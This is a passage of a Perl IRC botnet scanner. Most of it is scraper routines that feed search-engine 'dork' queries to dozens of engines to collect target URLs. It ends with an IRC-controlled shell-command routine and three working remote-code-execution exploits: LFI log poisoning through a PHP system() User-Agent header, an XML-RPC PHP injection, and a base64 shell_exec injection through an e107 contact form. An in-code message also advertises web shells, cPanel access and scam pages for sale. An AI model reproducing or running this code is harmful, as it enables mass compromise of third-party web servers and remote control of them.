    return @list;
}

sub seznam() {
	my @list;
	my $key = $_[0];
    for ($b=1; $b<=300; $b+=20) {
        my $search = ("http://search.seznam.cz/?q=".&keys($key)."&count=20&from=".$b);
        my $res = &search_engine_query($search);
        while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) {
            my $link = $1;
            if ($link !~ /seznam\.cz|chytrevyhledavani\.cz|smobil\.cz|sklik\.cz/i){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub hotbot() {
  my @list;
  my $key = $_[0];
    for ($b=0; $b<=50; $b+=1) {
        my $search = ("http://www.hotbot.com/search/web?pn=".$b."&q=".&keys($key));
        my $res = &search_engine_query($search);
		if ($res =~ m/had no web result/i) {$b=50;}
        while ($res =~ m/href=\"http:\/\/(.+?)\" title=/g) {
            my $link = $1;
            if ($link !~ /hotbot\.com/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;	
}

sub aol() {
	my @list;
	my $key = $_[0];
	for ($b=0; $b<=300; $b+=10) {
		my $search = ("http://search.aol.com/aol/search?q=".&keys($key)."&page=".$b);
		my $res = &search_engine_query($search);
		while ($res =~ m/href=\"http:\/\/(.*?)\"/g) {
			my $link = $1;
			if ($link !~ /aol\.com/){
				my @grep = &links($link);
				push(@list,@grep);
			}
		}
	}
	return @list;
}

sub biglobe {
  my $key = $_[0];
  my @list;
  for ($b=1; $b<=500; $b+=10) {
    $num += $num;
    my $search = "http://cgi.search.biglobe.ne.jp/cgi-bin/search-st_lp2?start=".$b."&ie=utf8&num=".$num."&q=".&keys($key)."&lr=all";
    my $res = &search_engine_query($search);
    while ( $res =~ m/<a href=\"http:\/\/(.+?)\"/g ) {
	    my $link = $1;
        if ($link !~ /biglobe/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub webcrawler() {
    my @list;
    my $key  = $_[0]; 
    for ($i = 0 ;$i <= 1400 ;$i += 20) {
        my $clink = ("http://www.webcrawler.com/search/web?qsi=".$i."&q=".&key($key)."&fcop=results-top");
        my $re = search_engine_query($clink);
        while ($re =~ m/nonpaid','(.*)','http:\/\/(.+?)\'/g) {
            my $h = $2;
            my @grep = &links($h);
	    push(@list,@grep);
        }
    }
    return @list;
}

sub pagina(){
    my @list;
    my $key = $_[0]; 
    my $i   = 0;
    for ($i=0; $i<=400; $i+=10){
        my $web=("http://startgoogle.startpagina.nl/index.php?q=".key($key)."&start=".$i."&origin=homepage&source=geentaal");       
        my $Res= search_engine_query($web);
        while ($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
            if ($1 !~ /pagina/){
                my $k=$1;
                my @grep=links($k);
		push(@list,@grep);
            }
        }
    }
    return @list;
}

sub gigablast() {
    my @lst;
    my $key = $_[0];
	my $b   = 0;
    for ($b = 0; $b <=400; $b += 10) {
        my $giga = ("http://szukaj.onet.pl/wiadomosci,".$b.",szukaj.html?qt=".key($key));
        my $Res = query($giga);
        while ($Res =~ m/href=http:\/\/(.+?)><font/g) {
            if ($1 !~ /onet/){
				my $k = $1;
                my @grep = links($k);
                push(@lst, @grep);
            }
        }
    }
    return @lst;
}

sub witch(){
	my @list;
	my $key = $_[0]; 
	for($b=0; $b<=180; $b+=10){
	my $Lyc = ("http://www.witch.de/search-result.php?searchtype=phonetisch&search=".key($key)."&cn=".$b);
	my $Res = search_engine_query($Lyc);
	while ($Res =~ m/<a href=\"http:\/\/(.+?)\"/g){
	my $k = $1;
	my @grep = &links($k);
	push(@list,@grep);
		}
	}
return @list;
}

sub amidalla(){
    my @list;
    my $key = $_[0]; 
    my $i   = 0;
    for ($i=1; $i<=200; $i+=10){
        my $web=("http://www.amidalla.de/cgi-bin/amisearch.cgi?search=".key($key)."&page=".$i."&break=10&af=2&tld=com&et=2");		
        my $Res= search_engine_query($web);
        while ($Res =~ m/<a href=\"http:\/\/(.+?)\//g){
            if ($1 !~ /amidalla/){
                my $k=$1;
                my @grep=links($k);
		push(@list,@grep);
            }
        }
    }
    return @list;
}

sub kvasir() {
    my @list;
    my $key = $_[0]; 
    for (my $i=0; $i<=1200; $i+=10){
        my $search = ("http://www.kvasir.no/nettsok?offset=".$i."&pageSize=10&q=".key($key));
        my $res = search_engine_query($search);
        while ($res =~ m/<a class=\"noClick\" href=\"http:\/\/(.+?)\"/g) {
            my $link = $1;
            if ($link !~ /kvasir/){
                my @grep = links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub baidu() {
	my @list;
	my $key = $_[0]; 
	for ($b=0; $b<=700; $b+=10) {
        my $search = ("http://www.baidu.com/s?wd=".&key($key)."&pn=".$b);
        my $res = search_engine_query($search);
        while ($res =~ m/href=\"http:\/\/(.*?)\"   target=/g) {
            if ($1 !~ /baidu\.com/){
            my $link = $1;
                my @grep = &links($link);
		push(@list,@grep);
            }
        }
    }
    return @list;
}

sub gibla() {
    my @lst;
    my $key = $_[0];
    my $b   = 0;
    for ($b = 0; $b <=400; $b += 10) {
        my $giga = ("http://szukaj.onet.pl/wiadomosci,".$b.",szukaj.html?qt=".key($key));
        my $Res = query($giga);
        while ($Res =~ m/href=http:\/\/(.+?)><font/g) {
            if ($1 !~ /onet/){
				my $k = $1;
                my @grep = links($k);
                push(@lst, @grep);
            }
        }
    }
    return @lst;
}

sub mywebsearch() {
    my @list;
    my $key = $_[0];
    for ($b = 1; $b<=30; $b+= 1) {
           my $search = ("http://search.mywebsearch.com/mywebsearch/GGweb.jhtml?searchfor=".&key($key)."&pn=".$b);
           my $res = search_engine_query($search);
           while ($res =~ m/<span class=\"uri\">http:\/\/(.+?)\<\/span>/g) {
                my $link = $1;
                if ($link!~ /mywebsearch/) {
                my @grep=links($link);
                push(@list,@grep);
           }
       }
   }
  return @list;
}

sub dogpile() {
    my @list;
    my $key = $_[0]; 
    my $name = $_[1];
    for ($b = 1; $b<=901; $b+= 10) {
           my $search = ("http://www.dogpile.com/info.dogpl/search/web?qsi=".$b."&q=".&key($key));
           my $res = search_engine_query($search);
           while ($res =~ m/<a class=\"resultDisplayUrl\" (.*) target=\"_blank\">(.+?)<\/a>/g) {
                my $link = $2;
                if ($link!~ /dogpile/) {
                my @grep=links($link);
		push(@list,@grep);
           }
       }
   }
  return @list;
}

sub teoma() {
    my @list;
    my $key = $_[0]; 
    for ($b = 1; $b<=90; $b+= 67) {
           my $search = ("http://www.teoma.com/web?q=".&key($key)."&page=".$b);
           my $res = search_engine_query($search);
           while ($res =~ m/href=\"http:\/\/(.+?)\"/g) {
                my $link = $1;
                if ($link!~ /teoma\.com/) {
                my @grep=links($link);
		push(@list,@grep);
           }
       }
   }
  return @list;
}

sub volunia() {
    my @list;
    my $key = $_[0]; 
    for ($b = 1; $b<=780; $b+= 46) {
           my $search = ("http://www.volunia.com/find/web?q=".&key($key)."&start=".$b);
           my $res = search_engine_query($search);
           while ($res =~ m/The map of http:\/\/(.+?) does not exist yet/g) {
                my $link = $1;
                if ($link!~ /volunia\.com/) {
                   my @grep=links($link);
                  push(@list,@grep);
           }
       }
   }
  return @list;
}

sub izito() {
	my @list;
	my $key = $_[0]; 
	for ($b=0; $b<=20; $b+=1) {
        my $search = ("http://www.izito.com/?query=".&key($key)."&where=web_izito&target=web_izito&vid=l1847521836I1359583892&con=y&asid=1810073229&tag=7570085394I1359583978&clt=topic&sr=r&pg=".$b);
        my $res = search_engine_query($search);
        while ($res =~ m/<div class=\"title_up\"><a href=\"http:\/\/(.*?)\" target=/g) {
            my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    return @list;
}

sub ananzi(){
    my @lst;
    my $key = $_[0];
    my $i   = 0;
    for ($i=0; $i<=100; $i+=1){
        my $web=("http://www.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch2.pl?qt=".key($key)."&page=".$i."&col=saweb5&x=&y=");
        my $Res= search_engine_query($web);
        while ($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){

            if ($1 !~ /ananzi/){
                my $k=$1;
                my @grep=links($k);
                push(@lst,@grep);
            }
        }
    }
return @lst;
}

sub amfibi() {
    my @list;
    my $key = $_[0];
    for (my $i=0; $i<=1000; $i+=10){
        my $search = ("http://www.amfibi.com/search?query=".key($key)."&start=".$i);
        my $res = search_engine_query($search);
        while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
            my $link = $1;
            if ($link !~ /amfibi/){
                my @grep = links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub snz() {
    my @list;
    my $key = $_[0];
    for (my $b=1; $b<=1000; $b+=100) {
        my $search = ("http://searchnz.co.nz/search.aspx?q=".&key($key)."&np=".$b);
        my $res = &search_engine_query($search);
        while ($res =~ m/<a href=\"?http:\/\/(.+?)\//g) {
            my $link = $1;
            if ($link!~ /searchnz/){
                my @grep = links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub ricerca() {
    my @list;
    my $key = $_[0];
    for (my $i=1; $i<=1000; $i+=10){
        my $search = ("http://ricerca.virgilio.it/ricerca?qs=".key($key)."l&filter=1&site=&lr=&hits=10&offset=".$i);
        my $res = search_engine_query($search);
        while ($res =~ m/<a href=\"http:\/\/([^>\"]*)/g) {
            my $link = $1;
            if ($link !~ /virgilio|ricerca/){
                $link =~ s/<//g;
                $link =~ s/ //g;
                my @grep = links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub bypass() {
	my @list;
	my $key = $_[0];
        my $search = ($bypass."?key=".uri_escape($key));
        my $res = &search_engine_query($search);
  		while ($res =~ m/<a href=\"http:\/\/(.*?)\">/g) {
#  		while ($res =~ m/<a href=\"\/url\?q=\http:\/\/([^>\"]*)\//g) {
            if ($link !~ /google/){
            my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    return @list;
}

sub bypass2() { 
		my @list; my $key = $_[0]; 
		my $search = ($bypass2."?key=".uri_escape($key)); 
		my $res = search_engine_query($search); 
		while ($res =~ m/<a href=\"\/url\?q=\http:\/\/([^>\"]*)\//g) { 
		if ($1 !~ /google/){ my $link = $1; my @grep = &links($link); push(@list,@grep); 
	   } 
		
	} 
	return @list; 
}

sub google2() {
	my @list;
	my $key = $_[0];
	my $b	  = 0;
	my @doms = ("ae","com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","co.ck","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","com.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn","hr","co.hu","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms","com.mt","mu","mw","com.mx","com.my","com.na","com.nf","com.ni","nl","no","com.np","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr","pt","com.py","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug","co.uk","com.uy","uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","co.zm");
	foreach my $domain (@doms) { $dom = $doms[rand(scalar(@doms))];
	for ($b=1; $b<=200; $b+=10) {
        my $search = ("http://www.google.".$dom."/search?num=50&q=".uri_escape($key)."&start=".$b."&sa=N");
        my $res = &search_engine_query($search);
        while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
            if ($1 !~ /google/){
            my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    } 
    return @list;
}

sub rambler(){
    my @list;
    my $key = $_[0];
    my $chan = $_[1];
        for ($b=1; $b<=1000; $b++){
        my $search=("http://nova.rambler.ru/srch?btnG=DtD%B0DaN?D%B8!&query=".&key($key)."&page=".$b);
        my $res= &search_engine_query($search);
        while ($res =~ m/<a target=\"_blank\" href=\"http:\/\/(.+?)\//g) {
            my $link = $1; if ($link!~ /rambler|nova|cache/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = links($link); push(@list,@grep);
            }
        }
    }
    &msg("$chan","8,1| 7[4Information7]8,1 ->  13,1Ready 0Shell c99 & r57 | cPanel | Mailer | Leads | FTP | SCAMPAGE) |4, 8Contact 7: 4  6||8 YM :  ");
    return @list;
}

sub msn() {
    my @lst;
    my $key = $_[0];
    for ( $b = 1 ; $b <= 1000 ; $b += 10 ) {
        my $MsN = ("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".key($key)."&q=".$b."&st=local");
        my $Res = &search_engine_query($MsN);
        while ( $Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g ) {
            if ( $1 !~ /\.sapo\.pt/ ) {
                my $k    = $1;
                my @grep = links($k);
                push( @lst, @grep );
            }
        }
    }
    return @lst;
}

sub mama() {
  my @lst;
  my $key = $_[0];
  my $b	  = 0;
  my @doms = ("at","au","br","ca","de","es","fr","it","uk","ru","nl","ca","us","eu","ro","org");
  foreach my $domain (@doms) { $dom = $doms[rand(scalar(@doms))];
    for (my $i=1; $i<=1000; $i+=100) {
        my $search = ("http://".$domain.".search.yahoo.com/search?n=100&p=".key($key)."&b=".$i);
        my $Res = &search_engine_query($search);
        while ($Res =~ m/http\%3a\/\/(.+?)\//g) {
            if ($1 !~ /yahoo\.com/){ my $k = $1; $k =~ s/<//g; $k =~ s/ //g; my @grep = links($k); push(@lst,@grep);
				}
			}
		} return @lst;
	}
}

sub cada(){
 
        my @list;
 
        my $key = $_[0];
 
        for($b=10;$b<=1000;$b+=100){
 
                my $Th=("http://cade.search.yahoo.com/search;_ylt=A0geu8ny1rRO8gQADw7b7Qt.?p=".key($key)."&fr=sfp&xargs=0&pstart=1&b=".$b);
 
                my $Res=&search_engine_query($Th);
 
                while($Res =~ m/http:\/\/(.+?)\//g){
 
                        my $link = $1; if ($1 !~ /cada|yahoo/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
 
                        }
 
                }
 
return @list;
 
}

sub iamsearch() {
  my @list;
    my $key = $_[0];
    for (my $i=1; $i<=50; $i+=1) {
        my $search = ("http://it.ask.com/web?q=".uri_escape($key)."&qsrc=0&o=0&l=dir&qid=EE90DE6E8F5370F363A63EC61228D4FE&page=".$i."&jss=1&dm=all");
        my $res = &search_engine_query($search);
		if ($res !~ /Successiva/) {$i=50;}
        while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=\"/g) {
            if ($1 !~ /ask\.com/){
            my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
 }
}

#########################################

sub clean() {
    my @cln = ();
    my %visit = ();
    foreach my $element (@_) {
        $element =~ s/\/+/\//g;
        next if $visit{$element}++;
        push @cln, $element;
    }
    return @cln;
}

sub key() {
    my $dork = $_[0];
    $dork =~ s/ /\+/g;
    $dork =~ s/:/\%3A/g;
    $dork =~ s/\//\%2F/g;
    $dork =~ s/&/\%26/g;
    $dork =~ s/\"/\%22/g;
    $dork =~ s/,/\%2C/g;
    $dork =~ s/\\/\%5C/g;
	$dork =~ s/@/\%40/g;
	$dork =~ s/\[/\%5B/g;
	$dork =~ s/\]/\%5D/g;
	$dork =~ s/\?/\%3F/g;
	$dork =~ s/\=/\%3D/g;
	$dork =~ s/\|/\%7C/g;
    return $dork;
}

sub keys() {
    my $dork = $_[0];
    $dork =~ s/ /\+/g;
    $dork =~ s/:/\%3A/g;
    $dork =~ s/\//\%2F/g;
    $dork =~ s/&/\%26/g;
    $dork =~ s/\"/\%22/g;
    $dork =~ s/,/\%2C/g;
    $dork =~ s/\\/\%5C/g;
	$dork =~ s/@/\%40/g;
	$dork =~ s/\[/\%5B/g;
	$dork =~ s/\]/\%5D/g;
	$dork =~ s/\?/\%3F/g;
	$dork =~ s/\=/\%3D/g;
	$dork =~ s/\|/\%7C/g;
    return $dork;
}

sub links() {
    my @list;
    my $link = $_[0];
    my $host = $_[0];
    my $hdir = $_[0];
    $hdir =~ s/(.*)\/[^\/]*$/\1/;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $host .= "/";
    $link .= "/";
    $hdir .= "/";
    $host =~ s/\/\//\//g;
    $hdir =~ s/\/\//\//g;
    $link =~ s/\/\//\//g;
    push(@list,$link,$host,$hdir);
    return @list;
}

sub search_engine_query() {
	my $url = $_[0];
	$url =~ s/http:\/\///;
	my $host = $url;
	my $query = $url;
	my $page  = "";
	$host =~ s/href=\"?http:\/\///;
	$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
	$query =~ s/$host//;
	if ($query eq "") { $query = "/"; }
		eval {
			my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
			my $sget = "GET $query HTTP/1.0\r\n";
			$sget .= "Host: $host\r\n";
			$sget .= "Accept: */*\r\n";
			$sget .= "User-Agent: $uagent\r\n";
			$sget .= "Connetion: Close\r\n\r\n";
			print $sock $sget;
			my @pages = <$sock>;
			$page = "@pages";
			close($sock);
		};
	return $page;
}

#########################################

sub shell() {
    my $path = $_[0];
    my $cmd = $_[1];
    if ($cmd =~ /cd (.*)/) {
        chdir("$1") || &msg("$path","No such file or directory");
        return;
    }
    elsif ($pid = fork) { waitpid($pid, 0); }
    else { if (fork) { exit; } else {
        my @output = `$cmd 2>&1 3>&1`;
        my $c = 0;
        foreach my $output (@output) {
            $c++;
            chop $output;
            &msg("$path","$output");
            if ($c == 5) { $c = 0; sleep 3; }
        }
        exit;
    }}
}

sub isAdmin() {
    my $status = 0;
    my $nick = $_[0];
    if ($nick eq $admin) { $status = 1; }
    return $status;
}

sub msg() {
    return unless $#_ == 1;
    sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");
}

sub nick() {
    return unless $#_ == 0;
    sendraw("NICK $_[0]");
}
sub notice() {
    return unless $#_ == 1;
    sendraw("NOTICE $_[0] :$_[1]");
}

sub cmdlfi() {
my $browser = LWP::UserAgent->new;
my $url  = $_[0];
my $cmd  = $_[1];
my $chan = $_[2];
my $hie = "lobex<?system(\"$cmd 2> /dev/stdout\"); ?>byroe";
$browser->agent("$hie");
$browser->timeout(7);
$response = $browser->get( $url );
if ($response->content =~ /lobex(.*)byroe/s) {
&msg("$chan","$lfilogo9 ".$1." ");
} else {
&msg("$chan","$lfilogo15 No Output ");
}
}
 
sub cmdxml() {

my $jed  = $_[0];
my $dwa  = $_[1];
my $chan = $_[2];
my $userAgent = LWP::UserAgent->new(agent => 'perl post');
        $exploit = "<?xml version=\"1.0\"?><methodCall>";
        $exploit .= "<methodName>test.method</methodName>";
        $exploit .= "<params><param><value><name>',''));";
        $exploit .= "echo'bamby';system('".$dwa."');echo'solo';exit;/*</name></value></param></params></methodCall>";
my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content => $exploit);
if ($response->content =~ /bamby(.*)solo/s) {
&msg("$chan","$xmllogo9 $1 ");
} else {
&msg("$chan","$xmllogo15 No Output ");
}
}
 
sub cmde107() {
my $path  = $_[0];
my $code = $_[1];
my $chan  = $_[2];
my $codecmd = encode_base64($code);
my $cmd = 'echo(base64_decode("QmFNYlk=").shell_exec(base64_decode("aWQ=")).base64_decode("Qnlyb2VOZXQ=")).shell_exec(base64_decode("'.$codecmd.'"));';
    my $req = HTTP::Request->new(POST => $path);
    $req->content_type('application/x-www-form-urlencoded');
    $req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%5B%2Fphp%5D");
    my $ua = LWP::UserAgent->new(agent => $uagent);
    $ua->timeout(7);
    my $res = $ua->request($req);
my $data = $res->as_string;
if ( $data =~ /ByroeNet(.*)/ ){
     $mydata = $1;
&msg("$chan","0,1(0E1070)4 $mydata");
}
else { &msg("$chan","0,1(0E1070)4 No Output"); }
}